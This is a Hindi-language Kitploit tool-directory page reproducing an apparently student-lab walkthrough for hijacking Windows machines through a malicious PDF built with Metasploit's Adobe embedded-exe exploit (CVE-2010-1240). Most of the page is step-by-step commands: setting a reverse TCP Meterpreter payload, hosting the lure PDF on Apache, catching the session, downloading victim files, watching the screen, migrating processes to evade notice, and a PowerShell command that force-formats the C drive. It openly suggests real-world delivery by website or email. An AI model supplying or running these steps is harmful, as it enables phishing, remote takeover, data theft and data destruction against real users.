Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Embedded-Backdoor-Connection — यह प्रदर्शन वीडियो दिखाता है कि कैसे हम पीड़ित के डिवाइस को नियंत्रित कर सकते हैं, लक्ष्य को एक निर्दोष दिखने वाली PDF फ़ाइल भेजकर जिसमें वास्तव में एम्बेडेड पेलोड होता है। इस शोषण को CVE-2010-1240 के रूप में सार्वजनिक किया गया था। | Kitploit
उपकरण/GitHubGitHub/omarothmann/embedded-backdoor-connection
फ़िशिंग उपकरणपेलोड जनरेशनशोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षालैब और अभ्यास

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHub
omarothmann/embedded-backdoor-connection

Embedded-Backdoor-Connection

यह प्रदर्शन वीडियो दिखाता है कि कैसे हम पीड़ित के डिवाइस को नियंत्रित कर सकते हैं, लक्ष्य को एक निर्दोष दिखने वाली PDF फ़ाइल भेजकर जिसमें वास्तव में एम्बेडेड पेलोड होता है। इस शोषण को CVE-2010-1240 के रूप में सार्वजनिक किया गया था।

रिपॉजिटरी देखें
844 साल पहलेअभी तक समीक्षित नहीं

पीडीएफ फाइलों के माध्यम से एम्बेडेड बैकडोर कनेक्शन 😈

आपके लिए प्रस्तुत    

परिचय

यह प्रदर्शन वीडियो दिखाता है कि हम लक्ष्य को निर्दोष दिखने वाली PDF फाइल भेजकर पीड़ित के डिवाइस को कैसे नियंत्रित कर सकते हैं, जिसमें वास्तव में एम्बेडेड पेलोड होता है। इस एक्सप्लॉइट को CVE-2010-1240 के रूप में सार्वजनिक किया गया था।

जैसे ही PDF को Adobe Reader में खोला जाता है, जो उपयोगकर्ता सुरक्षा पॉप-अप पर सहमत होने के लिए हमारे द्वारा धोखा दिए जाते हैं, वे हमें reverse TCP कनेक्शन के माध्यम से उनके डिवाइस से जुड़ा meterpreter सेशन प्राप्त करने देंगे। उस समय तक, उनका सारा डेटा और वे अभी क्या कर रहे हैं, सब कुछ हमारी निगरानी में रहता है।

हीहे~बॉय

सॉफ्टवेयर/टूल्स की सूची

  • Metasploit
  • Adobe Reader <= 8.1.2

वातावरण

Kali Linux         Windows 7 or 10         Adobe Reader        

  • हमलावर मशीन: Kali Linux संस्करण 2021.1
  • लक्ष्य OS: Windows 10 (x86) या Windows 7 (x86)
  • लक्ष्य सॉफ्टवेयर: Adobe Reader 8.1.2

विस्तृत चरण

सबसे पहले, हम MSFconsole लॉन्च करते हैं जो हमें Metasploit फ्रेमवर्क तक पहुंचने के लिए कमांड लाइन इंटरफेस प्रदान करता है।

root@kitploit:~
msfconsole

फिर, हमारे लक्ष्य Windows प्लेटफॉर्म और Adobe PDF Reader से मेल खाने वाले एक्सप्लॉइट की खोज करें, जहां यह एक्सप्लॉइट्स की एक पूरी सूची प्रदर्शित करेगा जिनका उपयोग पीड़ित की Windows मशीन को हाईजैक करने और Adobe PDF Reader की कमजोरियों का फायदा उठाने के लिए किया जा सकता है।

root@kitploit:~
search type:exploit platform:windows adobe pdf

इस एक्सप्लॉइटेशन में, हम पीड़ित को हाईजैक करने के लक्ष्य को प्राप्त करने हेतु नीचे दिए गए कमांड का उपयोग करके मॉड्यूल "adobe_pdf_embedded_exe" का चयन और उपयोग करते हैं।

root@kitploit:~
use exploit/windows/fileformat/adobe_pdf_embedded_exe

हम नीचे दिखाए अनुसार “info” कमांड का उपयोग करके एक्सप्लॉइट की जानकारी भी देख सकते हैं:

root@kitploit:~
info

फिर, हम reverse TCP कनेक्शन का उपयोग करने के लिए पेलोड सेट करते हैं। हम Meterpreter का भी उपयोग करते हैं, जो एक इंटरैक्टिव शेल प्रदान करता है जो पीड़ित की मशीन का पता लगाने के लिए कोड डालकर और निष्पादित करके सभी प्रकार के फ़ंक्शन का उपयोग करना आसान बनाता है।

root@kitploit:~
set payload windows/meterpreter/reverse_tcp

फिर, हम listening host और port सेट करेंगे। LHOST के लिए, हमें हमलावर मशीन का IP पता डालना होगा, जो इस मामले में हमारी Kali मशीन का IP पता (10.0.2.4)* है।

  • *p.s.
    • आपको अपनी खुद की Kali मशीन का IP उपयोग करना होगा
    • आप एक अलग पोर्ट नंबर का उपयोग कर सकते हैं

इस बीच LPORT के लिए, यह हम पर निर्भर है कि हम एक ऐसा पोर्ट नंबर सेट करें जो आमतौर पर उपयोग नहीं किया जाता है।

root@kitploit:~
# to check Kali machine’s IP address
ifconfig

set LHOST *10.0.2.4*
set LPORT 5665

फिर, हम INFILENAME* फ्लैग के साथ PDF के आधार के लिए इनपुट फाइल सेट करेंगे। इसके बाद, हम फाइलनाम को कुछ ऐसा सेट करेंगे जो पीड़ित की रुचि आकर्षित करे ताकि वह दुर्भावनापूर्ण PDF फाइल खोले।

  • *p.s.
    • आपको अपना PDF फाइल पथ सुनिश्चित करना होगा
    • आप एक अलग फाइलनाम का उपयोग कर सकते हैं
root@kitploit:~
set INFILENAME '/home/kali/Documents/WIC3004Assignment.pdf'
set FILENAME 'Bawang_Ranger_WIC3004Report.pdf'

पेलोड को PDF के साथ जेनरेट करने के लिए “exploit” कमांड दर्ज करने से पहले हम अपने विकल्पों को फिर से देख सकते हैं।

root@kitploit:~
# Then we can show the info or options by
show info | show options

exploit

एक बार जब हम PDF फाइल जेनरेट कर लेते हैं, तो हम फाइल को /var/www/html पर ले जाएंगे, जो हमारी Kali मशीन की निर्देशिका है, ताकि हमारे पीड़ित के लिए बाद में PDF फाइल डाउनलोड करने हेतु वेब एप्लिकेशन सर्वर होस्ट किया जा सके।

  • नोट:
    • यदि आपने एक अलग फाइलनाम सेट किया है, तो सुनिश्चित करें कि आप सही पथ कॉपी करें!
root@kitploit:~
sudo mv /home/kali/.msf4/local/Bawang_Ranger_WIC3004Report.pdf /var/www/html

फिर, अपना listener सेट करने के लिए, हम "exploit/multi/handler" का उपयोग करेंगे। फिर से, हम पेलोड, LHOST, LPORT को उसी के अनुरूप सेट करेंगे जो हमने दुर्भावनापूर्ण PDF फाइल जेनरेट करते समय परिभाषित किया था। फिर हम पेलोड चलाएंगे।

  • नोट:
    • LHOST: कृपया अपनी खुद की Kali मशीन के IP पते पर ध्यान दें
    • LPORT: यदि आपने एक अलग पोर्ट नंबर सेट किया है, तो सुनिश्चित करें कि आपने नंबर सही टाइप किया है
    • show info या show options चलाने के लिए वैकल्पिक कमांड है।
      • इसे चलाना केवल यह सत्यापित करने के लिए है कि आपने अभी क्या सेट किया है
root@kitploit:~
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.2.4
set LPORT 5665
[show info | show options]
run

एक अन्य टर्मिनल में, हम Apache सर्वर की स्थिति जांचते हैं ताकि यह सुनिश्चित किया जा सके कि यह /var/www/html में हमारी PDF फाइल होस्ट करने के लिए चल रहा है, ताकि पीड़ित फाइल डाउनलोड कर सके।

root@kitploit:~
service apache2 status

# If it is inactive, start the service
service apache2 start

Windows मशीन पर, Chrome ब्राउज़र जैसा कोई भी ब्राउज़र खोलें और Kali मशीन के वेब एप्लिकेशन सर्वर तक पहुंचने के लिए हमारा Kali IP (10.0.2.4)* टाइप करें।

*नोट: कृपया अपनी खुद की Kali मशीन के IP पते पर ध्यान दें

फिर, एक उपयोगकर्ता की तरह इच्छित PDF फाइल को सेव करें।

जैसे ही पीड़ित द्वारा फाइल को Adobe Reader 8.1.2 में सुरक्षा संकेत संदेशों को स्वीकार करते हुए खोला जाता है, हम अपनी Kali मशीन पर देख सकते हैं कि हमारे पास reverse TCP कनेक्शन के माध्यम से जुड़ा एक नया सेशन है।

वास्तविक दुनिया के परिदृश्य में, हम एम्बेडेड-पेलोड PDF के साथ एक वेबसाइट स्थापित करेंगे ताकि पीड़ित फाइल डाउनलोड कर सके या ईमेल के माध्यम से संलग्न कर सके।


एक्सप्लॉइटेशन का परिणाम

फिर, हम पीड़ित की मशीन पर दूरस्थ रूप से पहुंच सकते हैं और meterpreter सेशन में वे और अधिक दुर्भावनापूर्ण गतिविधियाँ कर सकते हैं जो हम चाहते थे।

उन चीजों की सूची दिखाने के लिए जो हम कर सकते हैं

root@kitploit:~
help

वर्तमान निर्देशिका सूचीबद्ध करें

root@kitploit:~
pwd

उस निर्देशिका में फाइल सूचीबद्ध करें

root@kitploit:~
ls

पीड़ित मशीन से फोल्डर या फाइल डाउनलोड करें

उदाहरण के लिए, यदि password.txt नाम की कोई फाइल है, तो हम download password.txt कमांड जारी कर सकते हैं

root@kitploit:~
download [folder name | filename with extension]

पीड़ित मशीन पर फाइल बनाएं

बेशक, यदि हम वाकई दुष्ट हैं तो हम Windows मशीन से जुड़े रहने के लिए दुर्भावनापूर्ण स्क्रिप्ट (बैकडोर इम्प्लांट करना) लिख सकते हैं! 💀

root@kitploit:~
   # Boot command prompt at background
   execute -f cmd.exe -H -i
   
   # Create file on Windows
   echo "You have been hacked" > hack.txt    

Windows के साथ इंटरैक्ट करें

root@kitploit:~
   #open the txt file we have just created
   hack.txt

   # Take screenshot
   screenshot
   
   # Watch the remote user in real time
   screenshare

अतिरिक्त

हालांकि, हमलावर meterpreter सेशन में migrate मॉड्यूल का उपयोग करके meterpreter प्रोसेस को किसी अन्य प्रोसेस में स्थानांतरित करके संदेह को कम कर सकता है।

root@kitploit:~
meterpreter> run post/windows/manage/migrate

यहां, यह पीड़ित की मशीन में स्वचालित रूप से एक नई प्रोसेस स्पॉन करेगा जिसमें यह स्वयं को स्थानांतरित कर सके। पीड़ित तब संक्रमित PDF फाइल को हटा पाएगा, पूरी तरह से अनजान कि प्रोसेस पहले ही कहीं और चली गई है।

हमलावर लक्ष्य मशीन पर कमांड प्रॉम्प्ट (cmd) या PowerShell का उपयोग करके दुर्भावनापूर्ण स्क्रिप्ट भी बना सकता है, जो पूरे ऑपरेटिंग सिस्टम को ठीक से काम न करने की स्थिति में ला सकती है।

root@kitploit:~
meterpreter> shell 
root@kitploit:~
# Start the Windows PowerShell
powershell

#Powershell command to forcefully format the C drive clean.
New-Partition -DiskNumber 1 -UseMaximumSize -AssignDriveLetter C| Format-Volume -DriveLetter C -FileSystemLabel "New"-FileSystem NTFS -Full -Force -Confirm:$false

प्रदर्शन वीडियो

डेमो

टूल डाउनलोड करें